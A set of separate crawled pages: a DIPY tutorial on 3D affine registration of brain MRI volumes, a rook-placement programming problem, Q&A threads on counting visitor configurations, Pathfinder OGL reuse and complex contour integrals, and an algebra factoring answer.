# Affine Registration in 3D This example explains how to compute an affine transformation to register two 3D volumes by maximization of their Mutual Information [Mattes03]. The optimization strategy is similar to that implemented in ANTS [Avants11]. We will do this twice. The first part of this tutorial will walk through the details of the process with the object-oriented interface implemented in the dipy.align module. The second part will use a simplified functional interface. from os.path import join as pjoin import numpy as np from dipy.viz import regtools from dipy.data import fetch_stanford_hardi from dipy.data.fetcher import fetch_syn_data from dipy.io.image import load_nifti from dipy.align.imaffine import (transform_centers_of_mass, AffineMap, MutualInformationMetric, AffineRegistration) from dipy.align.transforms import (TranslationTransform3D, RigidTransform3D, AffineTransform3D) Let's fetch two b0 volumes; the static image will be the b0 from the Stanford HARDI dataset: files, folder = fetch_stanford_hardi() static_data, static_affine, static_img = load_nifti( pjoin(folder, 'HARDI150.nii.gz'), return_img=True) static = np.squeeze(static_data)[..., 0] static_grid2world = static_affine Now the moving image: files, folder2 = fetch_syn_data() moving_data, moving_affine, moving_img = load_nifti( pjoin(folder2, 'b0.nii.gz'), return_img=True) moving = moving_data moving_grid2world = moving_affine We can see that the images are far from aligned by drawing one on top of the other. The images don't even have the same number of voxels, so in order to draw one on top of the other we need to resample the moving image on a grid of the same dimensions as the static image; we can do this by "transforming" the moving image using an identity transform: identity = np.eye(4) affine_map = AffineMap(identity, static.shape, static_grid2world, moving.shape, moving_grid2world) resampled = affine_map.transform(moving) regtools.overlay_slices(static, resampled, None, 0, "Static", "Moving", "resampled_0.png") regtools.overlay_slices(static, resampled, None, 1, "Static", "Moving", "resampled_1.png") regtools.overlay_slices(static, resampled, None, 2, "Static", "Moving", "resampled_2.png") We can obtain a very rough (and fast) registration by just aligning the centers of mass of the two images: c_of_mass = transform_centers_of_mass(static, static_grid2world, moving, moving_grid2world) We can now transform the moving image and draw it on top of the static image. The registration is not likely to be good, but at least they will occupy roughly the same space: transformed = c_of_mass.transform(moving) regtools.overlay_slices(static, transformed, None, 0, "Static", "Transformed", "transformed_com_0.png") regtools.overlay_slices(static, transformed, None, 1, "Static", "Transformed", "transformed_com_1.png") regtools.overlay_slices(static, transformed, None, 2, "Static", "Transformed", "transformed_com_2.png") This was just a translation of the moving image towards the static image; now we will refine it by looking for an affine transform. We first create the similarity metric (Mutual Information) to be used. We need to specify the number of bins to be used to discretize the joint and marginal probability distribution functions (PDF); a typical value is 32. We also need to specify the percentage (an integer in (0, 100]) of voxels to be used for computing the PDFs. The most accurate registration will be obtained by using all voxels, but it is also the most time-consuming choice.
We specify full sampling by passing None instead of an integer nbins = 32 sampling_prop = None metric = MutualInformationMetric(nbins, sampling_prop) To avoid getting stuck at local optima, and to accelerate convergence, we use a multi-resolution strategy (similar to ANTS [Avants11]) by building a Gaussian Pyramid. To have as much flexibility as possible, the user can specify how this Gaussian Pyramid is built. First of all, we need to specify how many resolutions we want to use. This is indirectly specified by just providing a list of the number of iterations we want to perform at each resolution. Here we will just specify 3 resolutions and a large number of iterations, 10000 at the coarsest resolution, 1000 at the medium resolution and 100 at the finest. These are the default settings level_iters = [10000, 1000, 100] To compute the Gaussian pyramid, the original image is first smoothed at each level of the pyramid using a Gaussian kernel with the requested sigma. A good initial choice is [3.0, 1.0, 0.0], this is the default sigmas = [3.0, 1.0, 0.0] Now we specify the sub-sampling factors. A good configuration is [4, 2, 1], which means that, if the original image shape was (nx, ny, nz) voxels, then the shape of the coarsest image will be about (nx//4, ny//4, nz//4), the shape in the middle resolution will be about (nx//2, ny//2, nz//2) and the image at the finest scale has the same size as the original image. This set of factors is the default factors = [4, 2, 1] Now we go ahead and instantiate the registration class with the configuration we just prepared affreg = AffineRegistration(metric=metric, level_iters=level_iters, sigmas=sigmas, factors=factors) Using AffineRegistration we can register our images in as many stages as we want, providing previous results as initialization for the next (the same logic as in ANTS). The reason why it is useful is that registration is a non-convex optimization problem (it may have more than one local optima), which means that it is very important to initialize as close to the solution as possible. For example, let’s start with our (previously computed) rough transformation aligning the centers of mass of our images, and then refine it in three stages. First look for an optimal translation. 
The dictionary regtransforms contains all available transforms, we obtain one of them by providing its name and the dimension (either 2 or 3) of the image we are working with (since we are aligning volumes, the dimension is 3) transform = TranslationTransform3D() params0 = None starting_affine = c_of_mass.affine translation = affreg.optimize(static, moving, transform, params0, static_grid2world, moving_grid2world, starting_affine=starting_affine) If we look at the result, we can see that this translation is much better than simply aligning the centers of mass transformed = translation.transform(moving) regtools.overlay_slices(static, transformed, None, 0, "Static", "Transformed", "transformed_trans_0.png") regtools.overlay_slices(static, transformed, None, 1, "Static", "Transformed", "transformed_trans_1.png") regtools.overlay_slices(static, transformed, None, 2, "Static", "Transformed", "transformed_trans_2.png") Now let’s refine with a rigid transform (this may even modify our previously found optimal translation) transform = RigidTransform3D() params0 = None starting_affine = translation.affine rigid = affreg.optimize(static, moving, transform, params0, static_grid2world, moving_grid2world, starting_affine=starting_affine) This produces a slight rotation, and the images are now better aligned transformed = rigid.transform(moving) regtools.overlay_slices(static, transformed, None, 0, "Static", "Transformed", "transformed_rigid_0.png") regtools.overlay_slices(static, transformed, None, 1, "Static", "Transformed", "transformed_rigid_1.png") regtools.overlay_slices(static, transformed, None, 2, "Static", "Transformed", "transformed_rigid_2.png") Finally, let’s refine with a full affine transform (translation, rotation, scale and shear), it is safer to fit more degrees of freedom now since we must be very close to the optimal transform transform = AffineTransform3D() params0 = None starting_affine = rigid.affine affine = affreg.optimize(static, moving, transform, params0, static_grid2world, moving_grid2world, starting_affine=starting_affine) This results in a slight shear and scale transformed = affine.transform(moving) regtools.overlay_slices(static, transformed, None, 0, "Static", "Transformed", "transformed_affine_0.png") regtools.overlay_slices(static, transformed, None, 1, "Static", "Transformed", "transformed_affine_1.png") regtools.overlay_slices(static, transformed, None, 2, "Static", "Transformed", "transformed_affine_2.png") Now, let’s repeat this process with a simplified functional interface: from dipy.align import affine_registration, register_dwi_to_template This interface constructs a pipeline of operations from a given list of transformations. pipeline = ["center_of_mass", "translation", "rigid", "affine"] And then applies the transformations in the pipeline on the input (from left to right) with a call to an affine_registration function, which takes optional settings for things like the iterations, sigmas and factors. The pipeline must be a list of strings with one or more of the following transformations: center_of_mass, translation, rigid, rigid_isoscaling, rigid_scaling and affine. 
xformed_img, reg_affine = affine_registration( moving, static, moving_affine=moving_affine, static_affine=static_affine, nbins=32, metric='MI', pipeline=pipeline, level_iters=level_iters, sigmas=sigmas, factors=factors) regtools.overlay_slices(static, xformed_img, None, 0, "Static", "Transformed", "xformed_affine_0.png") regtools.overlay_slices(static, xformed_img, None, 1, "Static", "Transformed", "xformed_affine_1.png") regtools.overlay_slices(static, xformed_img, None, 2, "Static", "Transformed", "xformed_affine_2.png") Alternatively, you can also use the register_dwi_to_template function that needs to also know about the gradient table of the DWI data, provided as a tuple of (bvals_file, bvecs_file). In this case, we are going to move the diffusion data to the B0 image (the opposite of the previous examples), which reverses what is the “moving” image and what is “static”. xformed_dwi, reg_affine = register_dwi_to_template( dwi=static_img, gtab=(pjoin(folder, 'HARDI150.bval'), pjoin(folder, 'HARDI150.bvec')), template=moving_img, reg_method="aff", nbins=32, metric='MI', pipeline=pipeline, level_iters=level_iters, sigmas=sigmas, factors=factors) regtools.overlay_slices(moving, xformed_dwi, None, 0, "Static", "Transformed", "xformed_dwi_0.png") regtools.overlay_slices(moving, xformed_dwi, None, 1, "Static", "Transformed", "xformed_dwi_1.png") regtools.overlay_slices(moving, xformed_dwi, None, 2, "Static", "Transformed", "xformed_dwi_2.png") Mattes03 Mattes, D., Haynor, D. R., Vesselle, H., Lewellen, T. K., Eubank, W. (2003). PET-CT image registration in the chest using free-form deformations. IEEE Transactions on Medical Imaging, 22(1), 120-8. Avants11(1,2) Avants, B. B., Tustison, N., & Song, G. (2011). Advanced Normalization Tools (ANTS), 1-35. Example source code You can download the full source code of this example. This same script is also included in the dipy source distribution under the doc/examples/ directory.
2022-05-17 11:55:52
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.3611546754837036, "perplexity": 3294.322018759113}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-21/segments/1652662517245.1/warc/CC-MAIN-20220517095022-20220517125022-00086.warc.gz"}
http://acm.hit.edu.cn/hojx/showproblem/1086/
# 1086 - Don't Get Rooked Time limit: 1 s Memory limit: 32 mb Submitted: 281 Accepted: 197 ### Problem Description In chess, the rook is a piece that can move any number of squares vertically or horizontally. In this problem we will consider small chess boards (at most 4 * 4) that can also contain walls through which rooks cannot move. The goal is to place as many rooks on a board as possible so that no two can capture each other. A configuration of rooks is legal provided that no two rooks are on the same horizontal row or vertical column unless there is at least one wall separating them. The following image shows five pictures of the same board. The first picture is the empty board, the second and third pictures show legal configurations, and the fourth and fifth pictures show illegal configurations. For this board, the maximum number of rooks in a legal configuration is 5; the second picture shows one way to do it, but there are several other ways. Your task is to write a program that, given a description of a board, calculates the maximum number of rooks that can be placed on the board in a legal configuration. ### Output For each test case, output one line containing the maximum number of rooks that can be placed on the board in a legal configuration. ### Sample Input 4 .X.. .... XX.. .... 2 XX .X 3 .X. X.X .X. 3 ... .XX .XX 4 .... .... .... .... 0 ### Sample Output 5 1 5 2 4
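The 4 * 4 bound makes exhaustive search trivial. Here is a minimal backtracking sketch (the board is given as a list of strings, as in the sample input):

```python
def max_rooks(board):
    """Max rooks on a walled board so that no two attack each other."""
    n = len(board)

    def safe(placed, r, c):
        # (r, c) is safe iff every placed rook in the same row/column
        # has a wall 'X' somewhere strictly between it and (r, c).
        for pr, pc in placed:
            if pr == r and 'X' not in board[r][min(pc, c) + 1:max(pc, c)]:
                return False
            if pc == c and not any(board[k][c] == 'X'
                                   for k in range(min(pr, r) + 1, max(pr, r))):
                return False
        return True

    best = 0
    def extend(start, placed):
        nonlocal best
        best = max(best, len(placed))
        for i in range(start, n * n):
            r, c = divmod(i, n)
            if board[r][c] == '.' and safe(placed, r, c):
                extend(i + 1, placed + [(r, c)])
    extend(0, [])
    return best

print(max_rooks(['.X..', '....', 'XX..', '....']))  # 5, as in the sample
```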
2017-09-23 20:07:22
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.32769522070884705, "perplexity": 422.7160553006756}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2017-39/segments/1505818689775.73/warc/CC-MAIN-20170923194310-20170923214310-00632.warc.gz"}
https://math.stackexchange.com/questions/665000/how-should-i-count-visitors-to-a-website-that-receives-visitors-from-3-locations
# How should I count visitors to a website that receives visitors from 3 locations? I'm doing a programming exercise; these are the instructions: TLDR version of problem below. Priority: Our website receives visitors from 3 locations, and the number of unique visitors from each of them is represented by three integers a, b and c. Considering our servers cannot serve more than N visitors, which is always less than the total number of users from all three locations, write a function that prints to the standard output (stdout) the number of unique possible configurations (as, bs, cs) which can be used to serve exactly N visitors. as represents the number of users from location a we choose to serve; bs represents the number of users from location b we choose to serve; cs represents the number of users from location c we choose to serve; a is an integer representing the number of users from location a; b is an integer representing the number of users from location b; c is an integer representing the number of users from location c; n is an integer representing the number of users our servers can serve. TLDR; The problem is something like: you have groups of visitors a, b, c. How many ways can you come up with n by taking a number from each of these groups? So the particular visitor doesn't matter, only the number of visitors and which group each comes from. Question: How do I express this as a Permutation or Combination? The program I'm writing has to be scalable for n's up to 100, so I can't just brute-force every possible scenario. I've brushed up on permutations and combinations, and I feel I have to do some sort of multiplication between dependent events. Or am I thinking too much into it? Any explanation would be awesome! I'm not lazy, just truly stuck. I'm missing something here. I came up with a "duh" implementation based on what ShreevatsaR said: My Code #include <iostream> using namespace std; void count_configurations(int a, int b, int c, int n) { int count = 0; for (int A = 0; A <= a; A++){ for (int B = 0; B <= b; B++){ for (int C = 0; C <= c; C++){ if (n == A + B + C) count++; } } } cout << count; } • If you wish to count the number of results printed, you can use the stars and bars argument, in particular Theorem 1: en.wikipedia.org/wiki/Stars_and_bars_(combinatorics) – Jacopo Notarstefano Feb 5 '14 at 19:27 • As it's a programming exercise, we should probably not give away the mathematical solution (or even terminology). However, note that what you're counting is the number of ways to write the number $n$ as $n = a + b + c$, where $a, b, c$ are nonnegative integers. You can try with brute-force all possibilities $0 \le a \le n$ for $a$, then all possibilities $0 \le b \le n$ for $b$, and see if there's a $c$ that works. This shouldn't be a problem at all for $n$ in the 100s. – ShreevatsaR Feb 5 '14 at 19:27 • Thanks! Both ideas are great starts. I think I can go from here. I just had a problem on how to think of the problem more abstractly, and how to apply it concretely in my case. The stars and bars method is exactly what I was looking for. Thanks Jacopo! And thanks ShreevatsaR for ideas on how to implement it. Thanks yall both! :D – veeberz Feb 5 '14 at 19:35
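The stars-and-bars comment can be pushed to a closed form with inclusion-exclusion over the three caps, replacing the triple loop with constant work per cap subset. A sketch:

```python
from math import comb

def count_configurations(a, b, c, n):
    """Number of (A, B, C) with 0<=A<=a, 0<=B<=b, 0<=C<=c and A+B+C == n."""
    def unbounded(k):
        # Solutions of x + y + z = k in nonnegative integers (stars and bars).
        return comb(k + 2, 2) if k >= 0 else 0

    total = 0
    for mask in range(8):  # inclusion-exclusion over which caps are exceeded
        k, bits = n, 0
        for cap, bit in ((a, 1), (b, 2), (c, 4)):
            if mask & bit:
                k -= cap + 1   # force that variable to exceed its cap
                bits += 1
        total += (-1) ** bits * unbounded(k)
    return total

print(count_configurations(2, 2, 2, 3))  # 7; the brute force above agrees
```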
2019-05-20 19:07:41
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.3411213159561157, "perplexity": 416.6473642188379}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-22/segments/1558232256100.64/warc/CC-MAIN-20190520182057-20190520204057-00246.warc.gz"}
http://rpg.stackexchange.com/questions/26826/what-content-can-i-reproduce-from-pathfinder
# What content can I reproduce from Pathfinder? What content can I reproduce from the Pathfinder gaming system? Is it anything from the Core Rulebook that isn't a specific name? For example, I like the d20PFSRD but the layout and ads annoy me. I want to create, on my own website, my own public reference for the Pathfinder classes, feats, prestige classes, all of that jazz. No, I'm not naive; I am aware of the abundance of content. I won't be doing all of it, but a lot of the Core Rulebook in a cleaner way. What can I "not" copy from the Core Rulebook onto the site? What can I "not" copy from other books listed in the Pathfinder OGL? I understand, of course, that I'll have to copy and link the OGL from Pathfinder's website in an easily viewable location. - Technically, what you are able to reproduce from any OGL work is everything that the OGL statement in that work says you can. Now, it's very likely that the PRD has most of that from most of the Pathfinder books, and that it's a pretty good arbiter of how to interpret the OGL statement when it's not clear. However, that's not guaranteed, and if you're getting set to do hundreds of man-hours of work yourself, you should first read and understand that statement, because that's the real "letter of the law." The PRD may not have everything you're entitled to reproduce, for example. Copying from the d20PFSRD is similarly not guaranteed. If Paizo makes a mistake on their PRD - well, they're certainly not going to sue themselves... d20PFSRD pulls from many locations and makes improvements/alterations. It's "probably safe", but again, the real guideline isn't what someone else has decided is open content; it's what the OGL states is open content. You are looking for the statements of Product Identity (cannot copy) and Open Content (can copy). It will read like this (this one cut and pasted from the Carrion Crown AP): Product Identity: The following items are hereby identified as Product Identity, as defined in the Open Game License version 1.0a, Section 1(e), and are not Open Content: All trademarks, registered trademarks, proper names (characters, deities, etc.), dialogue, plots, storylines, locations, characters, artwork, and trade dress. (Elements that have previously been designated as Open Game Content or are in the public domain are not included in this declaration.) Open Content: Except for material designated as Product Identity (see above), the game mechanics of this Paizo Publishing game product are Open Game Content, as defined in the Open Game License version 1.0a Section 1(d). No portion of this work other than the material designated as Open Game Content may be reproduced in any form without written permission. - The differences you have noticed between the core rulebook and the Pathfinder Reference Document are exactly everything that you may not reproduce. Put another way, the PRD exists to be exactly everything that is covered by the OGL. If it's not in the PRD, you may not reproduce it. That's what the name "Pathfinder Reference Document" means: it documents the OGLed parts of Pathfinder for your reference. - This, exactly, was what I was getting at with my comments. – KRyan Jul 2 '13 at 21:52 I appreciate the response. The issue that I think confused me was that PI includes spells and other content, yet they listed those in the PRD. Basically, their PRD is what I can reproduce on my own, perhaps applying fixes from errata and the rulebooks they reference.
– Moylin Jul 3 '13 at 0:52 @Moylin Where did you read that spells are PI? Spells aren't mentioned in the PI section of the PRD license I'm looking at. – SevenSidedDie Jul 3 '13 at 3:58 (e) "Product Identity" names and descriptions of characters, spells, enchantments, personalities, teams, personas, likenesses and special abilities; places, locations, environments, creatures, equipment, magical or supernatural abilities or effects, logos, symbols, or graphic designs – Moylin Jul 3 '13 at 9:18 @Moylin - That's the default, but you need to look at what Paizo designates OC vs PI as well: Product Identity: The following items are hereby identified as Product Identity, ... and are not Open Content: All trademarks, registered trademarks, proper names (characters, deities, etc.), dialogue, plots, storylines, locations, characters, artworks, and trade dress. | Open Content: Except for material designated as Product Identity (see above), the game mechanics of this Paizo Publishing game product are Open Game Content. – Bobson Jul 3 '13 at 17:01
2016-07-01 09:53:40
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.31929564476013184, "perplexity": 3745.795657357683}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 5, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2016-26/segments/1466783402516.86/warc/CC-MAIN-20160624155002-00104-ip-10-164-35-72.ec2.internal.warc.gz"}
https://www.gradesaver.com/textbooks/math/algebra/elementary-and-intermediate-algebra-concepts-and-applications-6th-edition/chapter-11-quadratic-functions-and-equations-11-1-quadratic-equations-11-1-exercise-set-page-707/86
## Elementary and Intermediate Algebra: Concepts & Applications (6th Edition) $(t+6)^{2}$ $12t+36+t^{2}\qquad$ ...recognize a perfect-square trinomial: $36$ and $t^{2}$ are squares. $=t^{2}+2\cdot 6\cdot t+36\qquad$ ...the sign of the middle term is positive, so write as $(A+B)^{2},\ A=t,\ B=6$ $=(t+6)^{2}$
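A one-line check of this factorization (a sketch using SymPy):

```python
import sympy as sp

t = sp.symbols('t')
print(sp.factor(12*t + 36 + t**2))  # (t + 6)**2
```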
2021-05-15 15:37:23
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.6982378363609314, "perplexity": 1887.628581553203}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-21/segments/1620243991370.50/warc/CC-MAIN-20210515131024-20210515161024-00341.warc.gz"}
http://math.stackexchange.com/questions/383874/evaluating-complex-integral
# Evaluating Complex Integral. I am trying to evaluate the following integrals: $$\int\limits_{-\infty}^\infty \frac{x^2}{1+x^2+x^4}dx$$ $$\int\limits_{0}^\pi \frac{d\theta}{a\cos\theta+ b} \text{ where }0<a<b$$ My very limited text has the following substitution: $$\int\limits_0^\infty \frac{\sin x}{x}dx = \frac{1}{2i}\int\limits_{\delta}^R \frac{e^{ix}-e^{-ix}}{x}dx \cdots$$ Is the same sort of substitution available for the polynomial? Thanks for any help. I apologize in advance for slow responses; I have a disability that limits me to an on-screen keyboard. - $f(z) := \frac{1}{a\cos z+b}$ Let $I$ be the integral in question. Let's double the integral, to get $$2I =\int_0^{2\pi} f(z)\, dz$$ Let $C$ be the contour of the unit circle $|z|=1$ in the positive direction. Then using this, we have $$2I = \oint_C \frac{1}{a\left(\frac{z+z^{-1}}{2}\right)+b}\frac{dz}{iz} = -2 i \oint_C \frac{dz}{az^2+2bz+a}$$ The last integral can be evaluated by residues. The poles of the function are at $$b_\pm = \frac{-b\pm \sqrt{b^2-a^2}}{a}$$ Based on $b>a>0$, we find the only pole in the contour $C$ is $b_+$. The residue there is: $$z_+ = \operatorname*{Res}_{z=b_+}\frac{1}{az^2+2bz+a} = \frac{1}{2\sqrt{b^2-a^2}}$$ Then $$2I = -2 i \left(\frac{2 \pi i}{2\sqrt{b^2-a^2}}\right) = \frac{2\pi}{\sqrt{b^2-a^2}}$$ Divide by $2$ and done. $$f(z) := \frac{z^2}{1+z^2+z^4} = \frac{z^2}{(z^2-z+1)(z^2+z+1)}$$ Poles of $f$ occur at, using the quadratic formula: $$b_{1} = \frac{1+\sqrt 3i}{2}$$ $$b_{2} = \frac{-1+\sqrt 3i}{2}$$ $$b_{3} = \frac{1-\sqrt 3i}{2}$$ $$b_{4} = \frac{-1-\sqrt 3i}{2}$$ Using the canonical semicircle contour ($Re^{i\theta}$ for $\theta \in [0,\pi]$) over the upper half plane, it is easily seen that the integral of $f(z)$ over the arc disappears as $R \to \infty$. Then we only need to find the residues at $b_1$ and $b_2$ (using the first or second formula here): $$z_1 = \operatorname*{Res}_{z=b_1}f(z)= \frac{1}{4}-\frac{i}{4\sqrt 3}$$ $$z_2 = \operatorname*{Res}_{z=b_2}f(z)= -\frac{1}{4}-\frac{i}{4\sqrt 3}$$ $$\oint_C f(z)\, dz = \int_{-\infty}^\infty f(x)\, dx = 2 \pi i (z_1+z_2) =-2 \pi i \frac{i}{2\sqrt 3} = \frac{\pi}{\sqrt 3}$$ - Check your work - I think there's a typo in your original function definition, in the denominator. –  Ron Gordon May 6 '13 at 23:37 For the first one, write $\dfrac{x^2}{1+x^2+x^4}$ as $\dfrac{x}{2(1-x+x^2)} - \dfrac{x}{2(1+x+x^2)}$. Now $$\dfrac{x}{(1-x+x^2)} = \dfrac{x-1/2}{\left(x-\dfrac12\right)^2 + \left(\dfrac{\sqrt3}2 \right)^2} + \dfrac{1/2}{\left(x-\dfrac12\right)^2 + \left(\dfrac{\sqrt3}2 \right)^2}$$ and $$\dfrac{x}{(1+x+x^2)} = \dfrac{x+1/2}{\left(x+\dfrac12\right)^2 + \left(\dfrac{\sqrt3}2 \right)^2} - \dfrac{1/2}{\left(x+\dfrac12\right)^2 + \left(\dfrac{\sqrt3}2 \right)^2}$$ I trust you can take it from here.
For the second one, from the Taylor series of $\dfrac1{b+ax}$, we have $$\dfrac1{b+a \cos(t)} = \sum_{k=0}^{\infty} \dfrac{(-a)^k}{b^{k+1}} \cos^{k}(t)$$ Now $$\int_0^{\pi} \cos^k(t)\, dt = 0 \text{ if } k \text{ is odd}$$ We also have that $$\color{red}{\int_0^{\pi}\cos^{2k}(t)\, dt = \dfrac{(2k-1)!!}{(2k)!!} \times \pi = \pi \dfrac{\dbinom{2k}k}{4^k}}$$ Hence, $$I=\int_0^{\pi}\dfrac{dt}{b+a \cos(t)} = \sum_{k=0}^{\infty} \dfrac{a^{2k}}{b^{2k+1}} \int_0^{\pi}\cos^{2k}(t)\, dt = \dfrac{\pi}{b} \sum_{k=0}^{\infty}\left(\dfrac{a}{2b}\right)^{2k} \dbinom{2k}k$$ Now from the Taylor series, we have $$\color{blue}{\sum_{k=0}^{\infty} x^{2k} \dbinom{2k}k = (1-4x^2)^{-1/2}}$$ Hence, $$\color{green}{I = \dfrac{\pi}{b} \cdot \left(1-\left(\dfrac{a}b\right)^2 \right)^{-1/2} = \dfrac{\pi}{\sqrt{b^2-a^2}}}$$

Although the solution above for the second integral works, it's nice to see a rather general method for turning such trigonometric integrals into contour integrals. The following method I learned from Ahlfors. We have $$I = \frac{1}{2} \int_{0}^{2 \pi} \frac{d \theta}{a \cos \theta + b}$$ For the right hand integral, consider the contour $C = \{|z| = 1\}$ in the complex plane. For $z = e^{i \theta} \in C$ we have $$\cos \theta = \frac{1}{2} \left(z + \frac{1}{z}\right)$$ and $$dz = i e^{i \theta} d \theta = i z\, d \theta$$ This leads to $$I = \frac{1}{2} \int_{C} \frac{dz}{iz\left(\frac{a}{2}\left(z + \frac{1}{z}\right) + b\right)}$$ You can now apply the usual residue calculus to this integral.

Here are the complex variables techniques you have asked for. For the first one, consider the complex integral $$\int\limits_{C} \frac{z^2}{1+z^2+z^4}dz,$$ where $C$ is the upper half of the circle $z=Re^{i\theta}$ centered at the origin. Check Jordan's lemma. For the second one, write it in the form $$\int\limits_{0}^\pi \frac{d\theta}{a\cos\theta+ b}= \frac{1}{2}\int\limits_{-\pi}^\pi\frac{d\theta}{a\cos\theta+ b},$$ since the integrand is an even function; then, since the integrand is $2\pi$-periodic, $$\frac{1}{2} \int\limits_{-\pi}^\pi \frac{d\theta}{a\cos\theta+ b}= \frac{1}{2}\int\limits_{0}^{2\pi} \frac{d\theta}{a\cos\theta+ b}.$$ Now, use complex variables techniques with $z=e^{i\theta}$, where $C:|z|=1$. For techniques to find the residue, see here.
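For readers who want to sanity-check the two closed forms, here is a short SymPy snippet (my own illustration, not part of the original answers); the symbol names and the sample values a = 1, b = 2 are arbitrary choices.

```python
# Numerical/symbolic sanity check of the two results derived above.
import sympy as sp

x, t = sp.symbols('x t', real=True)

# First integral: should equal pi/sqrt(3).
I1 = sp.integrate(x**2 / (1 + x**2 + x**4), (x, -sp.oo, sp.oo))
print(sp.simplify(I1 - sp.pi / sp.sqrt(3)))   # 0

# Second integral at a sample point with 0 < a < b, here a = 1, b = 2:
# should equal pi/sqrt(b^2 - a^2).
a_val, b_val = 1, 2
I2 = sp.integrate(1 / (a_val * sp.cos(t) + b_val), (t, 0, sp.pi))
print(sp.simplify(I2 - sp.pi / sp.sqrt(b_val**2 - a_val**2)))  # 0
```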
2015-05-27 20:51:29
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9832760095596313, "perplexity": 138.02664074849304}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2015-22/segments/1432207929096.44/warc/CC-MAIN-20150521113209-00287-ip-10-180-206-219.ec2.internal.warc.gz"}
